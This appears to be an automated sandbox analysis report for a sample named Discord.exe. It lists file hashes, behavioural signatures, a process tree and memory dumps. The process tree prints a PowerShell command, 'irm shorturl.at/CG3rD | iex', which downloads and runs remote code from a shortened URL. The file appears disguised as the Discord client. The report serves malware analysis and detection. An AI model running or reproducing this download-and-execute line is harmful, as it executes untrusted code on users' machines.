Overview

overview

10

Static

static

3

Discord.exe

windows7-x64

3

Discord.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29/09/2024, 16:05

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Discord.exe

  • Size

    120KB

  • MD5

    3d44681da2cf07c57e8c77f709213273

  • SHA1

    b8268ab05b2a1cfb133ae8f99cced9de7598c079

  • SHA256

    8c7b1b3f54174db0ecf87a690cacae9c74d2d2304bf60b66e3143b1a92a523d1

  • SHA512

    87c6600bf71ce48d200c72c2da48856713994a378fdab52094887b2bd0118a611f1c12aebb1697ca685c01a5f36649386f4534d7d08fc070ac6edd4844679e01

  • SSDEEP

    3072:QV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPIJn:dt5hBPi0BW69hd1MMdxPe9N9uA069TB4

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Discord.exe
    "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E16A.tmp\E16B.tmp\E16C.bat C:\Users\Admin\AppData\Local\Temp\Discord.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell "irm shorturl.at/CG3rD | iex"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:880

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\E16A.tmp\E16B.tmp\E16C.bat
          Filesize

          51B

          MD5

          2aed3dcc267eec515253717bf9add1b5

          SHA1

          85f480397cfc29c418edf61a1738722e537d1215

          SHA256

          349ec9c56361b1d114b3af7ce19d413fe077b966b795aed2a0f4882258c728c8

          SHA512

          4bab74637843769b0f4a255b875e4007a53d56c73051b679578009494e43340c5b57de67d433ac21203950b883c599451e89b9a4e6f67f6af050e3e40d71b0b1

          Download Submit

        • memory/880-6-0x000007FEF5E7E000-0x000007FEF5E7F000-memory.dmp

          Filesize

          4KB

          Download

        • memory/880-7-0x000000001B610000-0x000000001B8F2000-memory.dmp

          Filesize

          2.9MB

          Download

        • memory/880-8-0x0000000001E00000-0x0000000001E08000-memory.dmp

          Filesize

          32KB

          Download

        • memory/880-9-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/880-10-0x0000000001D74000-0x0000000001D77000-memory.dmp

          Filesize

          12KB

          Download

        • memory/880-12-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/880-13-0x000007FEF5BC0000-0x000007FEF655D000-memory.dmp

          Filesize

          9.6MB

          Download

        • memory/880-11-0x0000000001D7B000-0x0000000001DE2000-memory.dmp

          Filesize

          412KB

          Download